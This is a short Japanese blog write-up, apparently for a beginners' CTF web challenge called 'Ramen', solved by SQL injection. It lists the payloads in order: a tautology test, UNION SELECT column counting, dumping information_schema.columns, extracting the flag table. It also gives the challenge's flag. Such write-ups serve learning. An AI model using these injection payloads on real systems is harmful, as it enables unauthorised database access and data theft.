はまやんはまやんはまやん

hamayanhamayan's blog

Ramen [Beginners CTF2019 Web73]

https://score.beginners.seccon.jp

解法

まずは、SQL injectionできるかの確認(最後にスペース必要)

' OR 1=1 -- 

次に、もともとのSQLのクエリでselectされているカラムの個数を見つける

' union select null, null -- 

nullを増やしていくと、2つでエラーが消えるので、カラムは2つのようだ。
次にDBの情報を抜き出そう。

' union select table_name, column_name from information_schema.columns -- 

とてもいっぱい出てくるが、flagテーブルにflagカラムのみというやつがあるので、
これを取ってくることにする。

' union select flag, null from flag -- 

これで「ctf4b{a_simple_sql_injection_with_union_select}」が出てくる。